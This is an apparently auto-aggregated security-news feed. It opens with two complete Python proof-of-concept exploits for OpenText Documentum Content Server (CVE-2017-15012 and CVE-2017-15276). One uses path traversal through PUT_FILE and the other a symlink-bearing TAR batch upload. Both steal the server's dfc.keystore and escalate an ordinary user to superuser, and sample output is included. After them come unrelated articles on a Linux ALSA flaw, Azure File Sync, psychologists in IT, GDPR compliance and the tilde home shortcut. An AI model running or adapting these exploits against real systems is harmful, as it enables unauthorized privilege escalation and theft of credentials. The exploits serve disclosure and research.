[webapps] OpenText Documentum Content Server – Arbitrary File Download Privilege Escalation

[webapps] OpenText Documentum Content Server – Arbitrary File Download Privilege Escalation

http://ift.tt/2xOJmgM

#!/usr/bin/env python

# Opentext Documentum Content Server (formerly known as EMC Documentum Content Server)
# does not properly validate the input of the PUT_FILE RPC command, which allows any
# authenticated user to hijack an arbitrary file from the Content Server filesystem;
# because some files on the Content Server filesystem are security-sensitive,
# the security flaw described above leads to privilege escalation
#
# The PoC below demonstrates this vulnerability:
#
# MacBook-Pro:~ $ python CVE-2017-15012.py
# usage:
# CVE-2017-15012.py host port user password
# MacBook-Pro:~ $ python CVE-2017-15012.py docu72dev01 10001 dm_bof_registry dm_bof_registry
# Trying to connect to docu72dev01:10001 as dm_bof_registry ...
# Connected to docu72dev01:10001, docbase: DCTM_DEV, version: 7.2.0270.0377  Linux64.Oracle
# Downloading /u01/documentum/cs/product/7.2/bin/dm_set_server_env.sh
# Trying to find any object with content...
#     Downloading /u01/documentum/cs/shared/config/dfc.keystore
# Trying to find any object with content...
#     Trying to connect to docu72dev01:10001 as dmadmin ...
# Connected to docu72dev01:10001, docbase: DCTM_DEV, version: 7.2.0270.0377  Linux64.Oracle
# P0wned!
#
#

import socket
import sys
from os.path import basename

from dctmpy.docbaseclient import DocbaseClient, NULL_ID
from dctmpy.identity import Identity
from dctmpy.obj.typedobject import TypedObject

# OpenSSL-style cipher list handed to DocbaseClient for the TLS retry in
# create_session(); "aNULL" selects suites without server authentication,
# so that retry does not verify who it is talking to.
CIPHERS = "ALL:aNULL:!eNULL"


def usage():
    """Print the command-line synopsis, using the script's basename."""
    prog = basename(sys.argv[0])
    print "usage:\n\t%s host port user password" % prog


def main():
    """Entry point: demonstrate CVE-2017-15012 end to end.

    Connects with the supplied (non-superuser) credentials, derives the
    path of dm_set_server_env.sh from the dm_JMSAdminConsole method
    object, pulls that script with download() to learn DOCUMENTUM_SHARED,
    pulls dfc.keystore from there, then reconnects as the install owner
    with a trusted Identity built from that keystore and reports whether
    the new session is a superuser.  Every failure path prints a message
    and calls the builtin exit(1) (not sys.exit).
    """
    if len(sys.argv) != 5:
        usage()
        exit(1)

    # 'docbase' is returned by create_session but never used here.
    (session, docbase) = create_session(*sys.argv[1:5])

    # Nothing to demonstrate when the caller is already a superuser.
    if is_super_user(session):
        print "Current user is a superuser, nothing to do"
        exit(1)

    # method_verb of dm_JMSAdminConsole is a server-side path to
    # dm_jms_admin.sh; the sibling dm_set_server_env.sh is the target.
    admin_console = session.get_by_qualification(
        "dm_method where object_name='dm_JMSAdminConsole'")
    env_script = admin_console['method_verb']
    env_script = env_script.replace('dm_jms_admin.sh', 'dm_set_server_env.sh')

    keystore_path = None
    script = str(download(session, env_script, bytearray()))
    if not script:
        print "Unable to download dm_set_server_env.sh"
        exit(1)

    # First line starting with DOCUMENTUM_SHARED; the value is the second
    # '='-separated field, so a value containing '=' would be truncated and
    # surrounding quotes, if any, are kept verbatim.
    for l in script.splitlines():
        if not l.startswith("DOCUMENTUM_SHARED"):
            continue
        keystore_path = l.split('=')[1]
        break

    if not keystore_path:
        print "Unable to determine DOCUMENTUM_SHARED"
        exit(1)

    keystore_path += "/config/dfc.keystore"
    keystore = str(download(session, keystore_path, bytearray()))

    if not keystore:
        print "Unable to download dfc.keystore"
        exit(1)

    # Reconnect as r_install_owner with an empty password; presumably the
    # trusted, keystore-backed Identity replaces password authentication
    # (semantics live in dctmpy.identity, not shown here).
    (session, docbase) = create_session(
        sys.argv[1], sys.argv[2],
        session.serverconfig['r_install_owner'], "",
        identity=Identity(trusted=True, keystore=keystore))
    if is_super_user(session):
        print "P0wned!"


def download(session, path, buf):
    """Fetch an arbitrary server-side file through the PUT_FILE flaw.

    Registers *path* as the content of a new dmr_content object by passing
    a path-traversal argument to PUT_FILE (the server does not canonicalize
    it, per the header comment), then pulls that content back through the
    ordinary download RPC.  Chunks are appended to *buf* (a bytearray),
    which is also returned.  Raises RuntimeError when the content object
    cannot be saved or no puller handle is obtained.  The BEGIN_TRANS
    issued here is never ended anywhere in this script.
    """
    print "Downloading %s" % path
    print "Trying to find any object with content..."
    # Any existing sysobject with content is borrowed as parent_id for the
    # bogus dmr_content row.
    object_id = session.query(
        "SELECT FOR READ r_object_id "
        "FROM dm_sysobject WHERE r_content_size>0") \
        .next_record()['r_object_id']

    session.apply(None, NULL_ID, "BEGIN_TRANS")
    store = session.get_by_qualification("dm_filestore")
    format = session.get_by_qualification("dm_format")  # shadows builtin format()
    # Traversal prefix escapes the filestore root; the server-side check on
    # this argument is the missing validation this PoC demonstrates.
    remote_path = "common=/../../../../../../../../../..%s=Directory" % path
    result = session.put_file(store.object_id(), remote_path, format.object_id())
    full_size = result['FULL_CONTENT_SIZE']  # read but never used
    ticket = result['D_TICKET']

    content_id = session.next_id(0x06)  # 0x06 matches the dmr_content OBJECT_TYPE set below
    obj = TypedObject(session=session)
    obj.set_string("OBJECT_TYPE", "dmr_content")
    obj.set_bool("IS_NEW_OBJECT", True)
    obj.set_int("i_vstamp", 0)
    obj.set_id("storage_id", store.object_id())
    obj.set_id("format", format.object_id())
    obj.set_int("data_ticket", ticket)
    obj.set_id("parent_id", object_id)
    if not session.save_cont_attrs(content_id, obj):
        raise RuntimeError("Unable to save content object")

    handle = session.make_puller(
        NULL_ID, store.object_id(), content_id,
        format.object_id(), ticket
    )

    if handle == 0:
        raise RuntimeError("Unable make puller")

    for chunk in session.download(handle):
        buf.extend(chunk)

    return buf


def create_session(host, port, user, pwd, identity=None):
    """Open a DocbaseClient session, retrying over TLS after a reset.

    The first attempt is plain; if it fails with socket errno 54 (the
    BSD/macOS value, so this retry is platform-specific) the connection is
    retried with secure=True and the module CIPHERS list, which admits
    unauthenticated "aNULL" suites.  Any other socket.error propagates.
    Returns (session, docbase object_name) and prints the server version.
    """
    print "Trying to connect to %s:%s as %s ..." % \
          (host, port, user)
    connect_args = dict(
        host=host, port=int(port),
        username=user, password=pwd,
        identity=identity)
    try:
        session = DocbaseClient(**connect_args)
    except socket.error, e:
        if e.errno != 54:
            raise e
        session = DocbaseClient(
            secure=True, ciphers=CIPHERS, **connect_args)
    docbase = session.docbaseconfig['object_name']
    version = session.serverconfig['r_server_version']
    print "Connected to %s:%s, docbase: %s, version: %s" % \
          (host, port, docbase, version)
    return (session, docbase)


def is_super_user(session):
    """Return True when the session's user is a Documentum superuser.

    Two checks, in order: the dm_user row's user_privileges equals 16
    (exact comparison, not a bitmask test), or the user appears in the
    dm_superusers group.  The group query only runs if the first check
    fails.
    """
    account = session.get_by_qualification(
        "dm_user WHERE user_name=USER")
    if account['user_privileges'] == 16:
        return True
    superusers = session.get_by_qualification(
        "dm_group where group_name='dm_superusers' "
        "AND any i_all_users_names=USER")
    return superusers is not None


# Run the PoC only when executed as a script, not when imported.
if __name__ == '__main__':
    main()

Security News

via Exploit-DB Updates http://ift.tt/1HHo1m3

October 17, 2017 at 02:08PM

[webapps] OpenText Documentum Content Server – Privilege Escalation

[webapps] OpenText Documentum Content Server – Privilege Escalation

http://ift.tt/2kW6F1V

#!/usr/bin/env python

# Opentext Documentum Content Server (formerly known as EMC Documentum Content Server)
# contains the following design gap, which allows an authenticated user to gain the privileges
# of a superuser:
#
# Content Server allows content to be uploaded using batches (TAR archives); when unpacking
# TAR archives, Content Server fails to verify the contents of the TAR archive, which
# causes a path traversal vulnerability via symlinks; because some files on the Content Server
# filesystem are security-sensitive, the security flaw described above leads to
# privilege escalation
#
# The PoC below demonstrates this vulnerability:
#
# MacBook-Pro:~ $ python CVE-2017-15276.py
# usage:
# OTDocumentumTarVulnerability.py host port user password
# MacBook-Pro:~ $ python CVE-2017-15276.py docu72dev01 10001 dm_bof_registry dm_bof_registry
# Trying to connect to docu72dev01:10001 as dm_bof_registry ...
# Connected to docu72dev01:10001, docbase: DCTM_DEV, version: 7.2.0270.0377  Linux64.Oracle
# Downloading /u01/documentum/cs/product/7.2/bin/dm_set_server_env.sh
# Creating malicious dmr_content object
# Trying to find any object with content...
#     Downloading /u01/documentum/cs/shared/config/dfc.keystore
# Creating malicious dmr_content object
# Trying to find any object with content...
#     Trying to connect to docu72dev01:10001 as dmadmin ...
# Connected to docu72dev01:10001, docbase: DCTM_DEV, version: 7.2.0270.0377  Linux64.Oracle
# P0wned!


import io
import socket
import sys
import tarfile

from dctmpy import NULL_ID

from dctmpy.docbaseclient import DocbaseClient
from dctmpy.identity import Identity
from dctmpy.obj.typedobject import TypedObject

# OpenSSL-style cipher list handed to DocbaseClient for the TLS retry in
# create_session(); "aNULL" selects suites without server authentication,
# so that retry does not verify who it is talking to.
CIPHERS = "ALL:aNULL:!eNULL"


def usage():
    """Print the command-line synopsis, using the script name as invoked."""
    prog = sys.argv[0]
    print "usage:\n%s host port user password" % prog


def main():
    """Entry point: demonstrate CVE-2017-15276 end to end.

    Connects with the supplied (non-superuser) credentials, derives the
    path of dm_set_server_env.sh from the dm_JMSAdminConsole method
    object, pulls that script with download() (symlink-in-tar batch) to
    learn DOCUMENTUM_SHARED, pulls dfc.keystore from there, then reconnects
    as the install owner with a trusted Identity built from that keystore
    and reports whether the new session is a superuser.  Every failure
    path prints a message and calls the builtin exit(1) (not sys.exit).
    """
    if len(sys.argv) != 5:
        usage()
        exit(1)

    # 'docbase' is returned by create_session but never used here.
    (session, docbase) = create_session(*sys.argv[1:5])

    # Nothing to demonstrate when the caller is already a superuser.
    if is_super_user(session):
        print "Current user is a superuser, nothing to do"
        exit(1)

    # method_verb of dm_JMSAdminConsole is a server-side path to
    # dm_jms_admin.sh; the sibling dm_set_server_env.sh is the target.
    admin_console = session.get_by_qualification(
        "dm_method where object_name='dm_JMSAdminConsole'")
    env_script = admin_console['method_verb']
    env_script = env_script.replace('dm_jms_admin.sh', 'dm_set_server_env.sh')

    keystore_path = None
    script = str(download(session, env_script, bytearray()))
    if not script:
        print "Unable to download dm_set_server_env.sh"
        exit(1)

    # First line starting with DOCUMENTUM_SHARED; the value is the second
    # '='-separated field, so a value containing '=' would be truncated and
    # surrounding quotes, if any, are kept verbatim.
    for l in script.splitlines():
        if not l.startswith("DOCUMENTUM_SHARED"):
            continue
        keystore_path = l.split('=')[1]
        break

    if not keystore_path:
        print "Unable to determine DOCUMENTUM_SHARED"
        exit(1)

    keystore_path += "/config/dfc.keystore"
    keystore = str(download(session, keystore_path, bytearray()))

    if not keystore:
        print "Unable to download dfc.keystore"
        exit(1)

    # Reconnect as r_install_owner with an empty password; presumably the
    # trusted, keystore-backed Identity replaces password authentication
    # (semantics live in dctmpy.identity, not shown here).
    (session, docbase) = create_session(
        sys.argv[1], sys.argv[2],
        session.serverconfig['r_install_owner'], "",
        identity=Identity(trusted=True, keystore=keystore))
    if is_super_user(session):
        print "P0wned!"


def download(session, path, buf):
    """Fetch an arbitrary server-side file through the batch-unpack flaw.

    Uploads a small tar archive (see create_tar) holding a symlink to
    *path* as batch content of a new dmr_content object; per the header
    comment the server unpacks the batch without checking its members, so
    the symlink target ends up exposed as content.  The dmr_content row the
    server produces (page_modifier 'vuln') is then pulled back and appended
    to *buf*, which is returned.  The whole exchange runs inside a
    transaction that is always rolled back via end_tran(session, False).
    Failures before the pull print a message and exit(1); a missing puller
    handle raises RuntimeError; there is no try/finally, so an exception
    from upload() or download() leaves the transaction open.
    """
    print "Downloading %s" % path

    # Any dm_store and the 'crtext' format serve for the batch content.
    store = session.get_by_qualification("dm_store")
    format = session.get_by_qualification("dm_format where name='crtext'")  # shadows builtin format()

    print "Creating malicious dmr_content object"

    session.apply(None, NULL_ID, "BEGIN_TRANS")

    # Rejects 0 and negative handles here; the puller check below only tests == 0.
    handle = session.make_pusher(store['r_object_id'])
    if handle < 1:
        print "Unable to create pusher"
        end_tran(session, False)
        exit(1)

    # Archive = symlink "test" -> path plus property.txt.  The local name
    # 'bytes' shadows the builtin; 'length' is never used.
    (bytes, length) = create_tar("test", path)
    b = bytearray()
    b.extend(bytes.read())

    print "Trying to find any object with content..."
    # Any existing sysobject with content is borrowed as parent_id.
    object_id = session.query(
        "SELECT FOR READ r_object_id "
        "FROM dm_sysobject WHERE r_content_size>0") \
        .next_record()['r_object_id']

    content_id = session.next_id(0x06)  # 0x06 matches the dmr_content OBJECT_TYPE set below

    if not session.start_push(handle, content_id, format['r_object_id'], len(b)):
        print "Failed to start push"
        end_tran(session, False)
        exit(1)

    session.upload(handle, b)
    data_ticket = session.end_push_v2(handle)['DATA_TICKET']

    # BATCH_FLAG and page_modifier "dm_batch" mark the upload as a batch
    # for the server to unpack; the exact meaning of IS_ADDRENDITION is
    # Content Server behaviour not visible here.
    content = TypedObject(session=session)
    content.set_string("OBJECT_TYPE", "dmr_content")
    content.set_bool("IS_NEW_OBJECT", True)
    content.set_id("storage_id", store['r_object_id'])
    content.set_id("format", format['r_object_id'])
    content.set_int("data_ticket", data_ticket)
    content.set_int("page", 0)
    content.set_string("page_modifier", "dm_batch")
    content.set_string("full_format", format['name'])
    content.set_int("content_size", len(b))
    content.set_bool("BATCH_FLAG", True)
    content.set_bool("IS_ADDRENDITION", True)
    content.set_id("parent_id", object_id)
    if not session.save_cont_attrs(content_id, content):
        print "Failed to create content"
        end_tran(session, False)
        exit(1)

    # Presumably the server created this row from property.txt while
    # unpacking (page_modifier 'vuln', see create_tar).  The DQL is built
    # with %-formatting from a server-supplied object_id and a literal.
    content = session.get_by_qualification(
        "dmr_content WHERE any (parent_id='%s' "
        "AND page_modifier='%s')" % (object_id, "vuln"))

    # Mixed accessors: store['r_object_id'] above, store.object_id() here.
    handle = session.make_puller(
        NULL_ID, store.object_id(), content['r_object_id'],
        format.object_id(), data_ticket
    )

    if handle == 0:
        end_tran(session, False)
        raise RuntimeError("Unable make puller")

    for chunk in session.download(handle):
        buf.extend(chunk)

    # Always roll back; only the pulled bytes are kept.
    end_tran(session, False)
    return buf


def create_tar(linkname, linkpath):
    """Build an in-memory GNU tar with a symlink plus property.txt.

    The archive holds a symbolic link *linkname* -> *linkpath* (via
    add_link) and a property.txt that names that link as file_name with
    page_modifier 'vuln' and empty parameters.  Returns (BytesIO rewound
    to offset 0, archive length in bytes).  The local name 'bytes'
    shadows the builtin, and text.write() with str literals only works
    because this is Python 2 (a Python 3 BytesIO would need bytes).
    """
    bytes = io.BytesIO()
    tar = tarfile.TarFile(fileobj=bytes, mode="w", format=tarfile.GNU_FORMAT)
    add_link(tar, linkname, linkpath)
    text = io.BytesIO()
    text.write("file_name='%s'\n" % linkname)
    text.write("page_modifier='vuln'\n")
    text.write("parameters=''\n")
    tarinfo = tarfile.TarInfo("property.txt")
    # Size must be set before addfile; tell() gives the bytes written so far.
    tarinfo.size = text.tell()
    text.seek(0)
    tar.addfile(tarinfo, text)
    tar.close()
    # Measure after close() so the tar end-of-archive blocks are counted.
    length = bytes.tell()
    bytes.seek(0)
    return (bytes, length)


def add_link(tar, linkname, linkpath):
    """Append a symlink entry *linkname* -> *linkpath* to *tar*.

    Only the header is written (no data), which is how tarfile stores
    symbolic links; the receiving side decides whether to honour it.
    """
    tarinfo = tarfile.TarInfo(linkname)
    tarinfo.type = tarfile.SYMTYPE
    tarinfo.linkpath = linkpath
    tarinfo.name = linkname  # already set by the constructor; reassigned for clarity
    tar.addfile(tarinfo=tarinfo)


def create_session(host, port, user, pwd, identity=None):
    """Open a DocbaseClient session, retrying over TLS after a reset.

    The first attempt is plain; if it fails with socket errno 54 (the
    BSD/macOS value, so this retry is platform-specific) the connection is
    retried with secure=True and the module CIPHERS list, which admits
    unauthenticated "aNULL" suites.  Any other socket.error propagates.
    Returns (session, docbase object_name) and prints the server version.
    """
    print "Trying to connect to %s:%s as %s ..." % \
          (host, port, user)
    connect_args = dict(
        host=host, port=int(port),
        username=user, password=pwd,
        identity=identity)
    try:
        session = DocbaseClient(**connect_args)
    except socket.error, e:
        if e.errno != 54:
            raise e
        session = DocbaseClient(
            secure=True, ciphers=CIPHERS, **connect_args)
    docbase = session.docbaseconfig['object_name']
    version = session.serverconfig['r_server_version']
    print "Connected to %s:%s, docbase: %s, version: %s" % \
          (host, port, docbase, version)
    return (session, docbase)


def is_super_user(session):
    """Return True when the session's user is a Documentum superuser.

    Two checks, in order: the dm_user row's user_privileges equals 16
    (exact comparison, not a bitmask test), or the user appears in the
    dm_superusers group.  The group query only runs if the first check
    fails.
    """
    account = session.get_by_qualification("dm_user WHERE user_name=USER")
    if account['user_privileges'] == 16:
        return True
    superusers = session.get_by_qualification(
        "dm_group where group_name='dm_superusers' "
        "AND any i_all_users_names=USER")
    return superusers is not None


def end_tran(session, commit=False):
    """End the transaction opened with BEGIN_TRANS.

    Sends END_TRANS with a COMMIT flag equal to *commit*; the default
    (and every caller in this script) rolls back.
    """
    args = TypedObject(session=session)
    args.set_bool("COMMIT", commit)
    session.apply(None, NULL_ID, "END_TRANS", args)


# Run the PoC only when executed as a script, not when imported.
if __name__ == '__main__':
    main()

Security News

via Exploit-DB Updates http://ift.tt/1HHo1m3

October 17, 2017 at 02:08PM

Elevation of Privilege Flaw Impacts Linux Kernel

Elevation of Privilege Flaw Impacts Linux Kernel

http://ift.tt/2hM2ctM

The Linux kernel is susceptible to a local escalation of privilege impacting the Advanced Linux Sound Architecture (ALSA), Cisco warns.

Tracked as CVE-2017-15265, the vulnerability can be exploited by an attacker to gain elevated privileges on the targeted system. However, because the issue requires local access to the targeted system, the likelihood of a successful exploit is reduced.

“The vulnerability is due to a use-after-free memory error in the ALSA sequencer interface of the affected application. An attacker could exploit this vulnerability by running a crafted application on a targeted system. A successful exploit could allow the attacker to gain elevated privileges on the targeted system,” Cisco explains in an advisory published on Friday, October 13.

Discovered by Michael23 Yu and already confirmed by Kernel.org, the bug starts with a potential race window that opens when creating and deleting a port via ioctl.

The issue is that snd_seq_create_port() creates the port object and returns its pointer, but the object can be deleted immediately by another thread because the function doesn’t take a refcount. snd_seq_ioctl_create_port() still calls snd_seq_system_client_ev_port_start() with the already-deleted port object, thus triggering the use-after-free.

A patch has been already published on the ALSA project’s website: “it’s fixed simply by taking the refcount properly at snd_seq_create_port() and letting the caller unref the object after use.  Also, there is another potential use-after-free by sprintf() call in snd_seq_create_port(), and this is moved inside the lock.”

Related: Two-Year Old Vulnerability Patched in Linux Kernel

Related: Google Researcher Details Linux Kernel Exploit

Ionut Arghire is an international correspondent for SecurityWeek.


Security News

via SecurityWeek RSS Feed http://ift.tt/T5XpCH

October 17, 2017 at 02:06PM

Azure File Sync links on-premises file server with cloud-based Azure Files

Azure File Sync links on-premises file server with cloud-based Azure Files

http://ift.tt/2xMH9Cu

Microsoft recently announced the public preview for Azure File Sync. This new Microsoft Azure service is meant to help users expand their on-premises file servers to Azure Files.

The general idea is that this service allows you to have a stronger connection between your cloud files and on-premises storage, making the task of managing all of those files a little more seamless. Here are some of the features and benefits that you can take advantage of with this new offering.

Mix cloud benefits with on-premises storage with Azure File Sync

In essence, Azure File Sync gives you the ability to tier files between your on-premises file server and cloud-based Azure Files. With this capability, you can keep only the newest and most recently accessed files locally while still maintaining the ability to see and access the entire namespace through seamless cloud recall. So effectively, you can transform your Windows File Server into an on-premises tier of Azure Files.

Solve global access problems

Azure File Sync also makes it easy to solve global access problems introduced by having a single point of access on-premises, or by replicating data in Azure between Azure File shares and servers in any location. A new concept that comes with Azure File Sync, called the Sync Group, lets you manage the locations that should be kept in sync with each other.

React in emergency situations

Azure File Sync also helps you keep control over your data and recover in the case of an emergency. By setting up a new Windows Server and installing Azure File Sync, the namespace is nearly instantly synced down as your cache is rebuilt. Additionally, cloud tiering moves old and infrequently accessed files to Azure, helping you make storage growth more predictable.

Azure File Sync is already available as a preview offering. Microsoft has some documentation available on its website to help users set up and configure the program.

Photo credit: Freerange Stock

The post Azure File Sync links on-premises file server with cloud-based Azure Files appeared first on TechGenix.

Security News

via Comments on: http://techgenix.com

October 17, 2017 at 01:31PM

A crazy idea: Is psychologist the next hot IT job?

A crazy idea: Is psychologist the next hot IT job?

http://ift.tt/2xLMS6F

Growing up, my siblings and I were absolutely nothing alike, nor did we become more similar to one another as adults. I was the nerdy kid who eventually went into computers and aerospace. My brother was the outdoorsy one, and my late sister was the one with all of the fancy degrees, and who eventually went on to become a mental health professional. Believe me when I say that I always assumed there was absolutely no chance that our career paths would ever cross. After all, my sister didn’t exactly have a deep understanding of the way that computers work, nor am I even remotely qualified to be prescribing Thorazine to someone who is experiencing psychotic episodes. Even so, I can’t help but wonder if we are about to see a strange career path convergence: Is psychologist the next hot IT job?

Sigmund Freud

Wikimedia

So, are future IT pros going to be required to hold a psychology degree? I have to admit that the question sounds like a bad joke. Even as I typed the question in the previous sentence, my mind instantly flashed back to the days of working helpdesk support early in my IT career, and to all of the seemingly emotionally disturbed callers who clearly “needed help.” As tempting as it may be to delve into stories of some of the stranger interactions that I have had with end users over the years, I’m not going to go there. In fact, my question over whether mental health professionals are about to be in demand in the world of IT is absolutely serious. In fact, it is already happening.

For me to be able to adequately explain why some IT shops are suddenly hiring psychologists, I have to talk a little bit about the current state of the tech industry. As you are no doubt aware, one of the biggest tech trends from four or five years ago was the so-called Big Data revolution. At the time, Big Data was really nothing more than a somewhat meaningless buzzword referring to the accumulation of large volumes of data. Over time however, the phrase “Big Data” slowly began to morph into “Big Data analytics.” Suddenly, it wasn’t so much the volume of data that really mattered, as what you could do with that data.

I have often said that the IT department’s job is to use technology to solve business problems. Big Data analytics might just be the perfect illustration of this philosophy. A company’s data is a tangible asset, and the entire science of data analytics is devoted to deriving useful, and often hidden, meanings from the data to help the business to flourish.

OK, that’s all good and well, but right about now I’m sure that you are probably wondering what any of this has to do with mental health professionals being recruited into IT positions.

Data does not lie — or does it?


Back in college, I remember one of my Computer Science professors saying that data does not lie. I think that this statement was probably true at one time, but today things are different than they once were. Data might not outright lie, but it can be very misleading. This is especially true for an organization that is mining vast quantities of data in an effort to derive hidden business value.

The problem with looking for hidden meaning within a large data set is that it often leads to the discovery of trends that are circumstantial and not firmly based in reality. Let me give you an example.

Imagine for a moment that a particular company manufactures widgets, and that the company decides to analyze its data to try to figure out the circumstances under which customers are purchasing the widgets. After careful analysis of the data, a trend emerges that shows that on the second Tuesday of each month, customers in Kentucky and North Dakota tend to purchase blue widgets, when the color selection is more evenly distributed at all other times.

Unless the Kentucky Wildcats (whose team colors are blue and white) happen to play their games on the second Tuesday of the month, this is probably a junk statistic. The statistic might be accurate with regard to what the data is saying, but it does not reflect the nature of human behavior. I mean let’s face it: Nobody wakes up in the morning and says, “Hey, it’s the second Tuesday of the month, so I better go buy a blue widget.” The trend might exist, but it is probably a coincidence. If additional data is allowed to accumulate over a longer period of time, then the data would probably show that widget color selection on a particular day of the month is actually random.

Being too focused

Even though this particular example is made up, it is loosely based on a real-world situation that I recently heard about. In the real story, the data scientists who were working for a particular company kept finding trends within the data that didn’t really coincide with the way that things work in the real world. This isn’t to say that the data scientists were stupid. I’m sure that they were all intelligent people. It’s just that when you are studying data, it is possible to become so focused on the data itself, it is easy to forget that the data corresponds to events taking place outside of the datacenter.

The problem with this, of course, is that no company performs Big Data analytics just for the fun of it. The ultimate goal is to be able to use the data, and the trends that have been derived from that data to make better business decisions. So with that in mind, imagine what would happen if the company from my previous example decided to manufacture a bunch of extra blue widgets and ship them off to Kentucky and North Dakota. That would probably prove to be a bad business decision. The trend that was spotted within the data was based on a coincidence, and does not reflect a repeatable pattern of behavior. As such, a company that tries to capitalize on this trend would most likely be stuck with an oversupply of blue widgets that nobody is buying.

Recently, I have actually heard of a couple of companies hiring psychologists as a part of their data analytics teams. Although the psychologists might not have a background in data analytics, they do have a background in human behavior, and may therefore be able to help the data scientists to better distinguish between an actual business trend and a junk statistic. In some cases, psychologists may even be able to help the data scientists figure out what sorts of data patterns they should be looking for.

New way of doing things

In my opinion, the most interesting thing about IT shops beginning to hire psychologists is that it reflects a new way of doing things. Although saying this might be taken as heresy, I think that the successful use of psychologists on data analytics teams clearly demonstrates that there is a place for nontechnical people in IT. Don’t get me wrong, I would never condone bringing some random person in off the street and letting them run the entire datacenter. However, I wholeheartedly believe that IT can benefit from bringing in people with specialized skill sets that don’t necessarily mesh with traditional IT shops. It will be really interesting to see the direction that IT goes from here.

Photo credit: Pixabay

The post A crazy idea: Is psychologist the next hot IT job? appeared first on TechGenix.

Security News

via Comments on: http://techgenix.com

October 17, 2017 at 01:31PM

RSA Unveils New GDPR Compliance Offerings

RSA Unveils New GDPR Compliance Offerings

http://ift.tt/2xM5vHw

RSA Says GDPR is More About Evidence-based Process Than Technology

Europe’s General Data Protection Regulation (GDPR) is, by name, just another information security compliance regulation requiring that organizations protect personal data from being stolen by hackers. As such, there should be little for organizations to do since most companies already do all they can to defend against breaches (albeit not always successfully). That, however, would be a total misunderstanding of this new regulation.

The emphasis on data protection has changed: it is traditionally designed to protect data from criminals; but this regulation is designed to protect data for the user. It is a subtle change with huge ramifications, because now users are in charge of their own personal information. They must explicitly agree to the collection of data for a specific purpose; and they can withdraw consent and require companies to delete that data.

This simple change means that data governance is now front and center, side by side with data security. Organizations will need to be able to prove user agreement to the collection of personal data; and must be able to demonstrate deletion of that data after demand. This also means that organizations must be aware of the location of all personal data at all times.

“GDPR is not just about technology,” Rashmi Knowles, RSA Field CTO EMEA, told SecurityWeek. “I think the bigger part of GDPR is to do with process, and the process burden is going to be huge. One of the big new things is the whole personal data lifecycle — from getting consent and proving user consent, to processing user data and then deleting that data after processing it solely for the purpose for which it was collected; and being able to delete it at any time on the users’ request. Although some organizations already do that, a lot of companies don’t do it very well, and don’t have the evidence to prove they are doing it. GDPR is very much evidence based.”

There is another major change. Sanctions for non-compliance have been dramatically increased. While large corporations could simply accept the minimal fines from the existing Directive-based European laws as part of acceptable risk tolerance, under the Regulation fines are now geared, potentially, to seriously affect the bottom line of non-compliant companies for many years. The regulators are taking GDPR very seriously, and they expect organizations to do the same. There is the implication that these regulators will not back away from imposing very heavy fines for the worst cases of non-compliance.

It is against the background of GDPR being as much about data governance as it is about information security that RSA has today beefed up its Archer governance suite specifically to aid compliance with the governance side — and more — of GDPR. “Ultimately,” it says in a statement released today, “GDPR is not just a Governance, Risk and Compliance (GRC) issue. GDPR spans the full enterprise and forces companies to adopt a healthier privacy and security risk posture in four critical areas: Risk Assessment, Breach Readiness, Data Governance, and Compliance Management.”

It is in these four areas that Archer, combined with RSA NetWitness and the RSA Data Risk and Security Practice can aid GDPR compliance. On risk assessment, RSA suggests that Archer’s components will help accelerate the identification of the linkage between risks and internal controls, potentially reduce the GDPR compliance gaps and improve risk mitigation strategies.

On breach response, GDPR requires that regulators are notified of a breach generally within 72 hours of the company becoming aware of the breach. Here, RSA says its NetWitness product will scan the entire network infrastructure looking for indications of a compromise. It uses, explains RSA, “behavioral analysis and machine learning to help better understand the scope and nature of a breach with improved visibility into the attack sequence, enabling faster notification.”

RSA offers its SecurID suite and Data Risk and Security Practice service to cover the mainstream governance side of GDPR. Compliance is no longer a destination, but a continuing state, it suggests. While under earlier European laws, companies needed only worry about compliance if they were breached, with GDPR they can be found non-compliant in data governance areas at any time. This suite of services helps an organization optimize a GRC program; put in place the processes to enable a prompt response to cyber incidents; prepare to meet the new 72-hour notification requirements; and plan and implement GDPR-compliant data access programs.

Organizations will “see quicker reaction to emerging issues, create a more proactive and resilient environment, and reduce the churn in driving accountability towards GDPR compliance,” says RSA.

But while GDPR may be more about process and evidence, the technology side cannot be ignored. The term ‘breach’ is given a wider than usual scope under GDPR. “A breach in GDPR could be lack of availability,” Knowles told SecurityWeek; “so a successful DDoS — which may not usually be classed as a breach — could be classed as a breach in GDPR terms if users lose access to their data.” 

In this sense, being struck by something like ransomware would prove a double-whammy. Firstly the victim gets all the disruption and cost of the ransomware, but secondly it is potentially and automatically in breach of GDPR. “If you can show that you are doing the right things, that you have the right controls in place,” says Knowles, “then the regulators are more likely to be lenient from the GDPR perspective. But on the other hand, if the ransomware could have been stopped had you applied the correct patches, the regulator might not be so lenient.”

GDPR compliance is a complex mix of security technology to protect the data, tied together with governance processes to manage the personal data lifecycle, backed up by the availability of continuous evidence to prove that you are doing the right things at all times.

Kevin Townsend is a Senior Contributor at SecurityWeek. He has been writing about high tech issues since before the birth of Microsoft. For the last 15 years he has specialized in information security; and has had many thousands of articles published in dozens of different magazines – from The Times and the Financial Times to current and long-gone computer magazines.


Security News

via SecurityWeek RSS Feed http://ift.tt/T5XpCH

October 17, 2017 at 01:22PM

Why Does ~ Represent the Home Folder on macOS and Linux?


http://ift.tt/2hMwa0S

Whether you’ve installed the Linux subsystem on Windows 10 or are getting started using the Linux Terminal, there are all kinds of shorthands you need to learn…none of which are intuitive.

For example there’s the tilde, ~, which represents your home folder. Typing cd ~/Documents switches to the Documents folder in the current user’s home directory, saving you from having to type the full path (for example /Users/justinpot/Documents) every time. Note that it is the shell, not the filesystem, that expands ~ before the command runs, which is why the shortcut works only where the shell sees it unquoted. It’s a convenient shortcut, sure, but why is that particular character used for this?

Believe it or not, it’s because of a keyboard from the 1970s. Here’s a Lear Siegler ADM-3A terminal, first shipped in 1975.

This was a “dumb terminal,” meaning it wasn’t a computer in itself, but instead allowed you to input commands to and display data from a computer. The ADM-3A cost only $995, which believe it or not was a good price at the time, meaning institutions could purchase several such terminals to connect to one central computer. To this day, modern “terminal emulators,” such as those used in Linux and macOS, mimic functionality from such systems.

It’s a hugely influential piece of hardware; a lot of early software development happened on it, meaning the keyboard layout influenced a few design choices. Check it out:

Notice anything? Here’s a clearer image.

See the key at top-right? That’s the HOME key, which acts similarly to the Home key on modern keyboards, bringing the cursor to the top-left position while editing text. It’s also the key used for the tilde symbol: ~. That association was enough for ~ to eventually represent home folders.

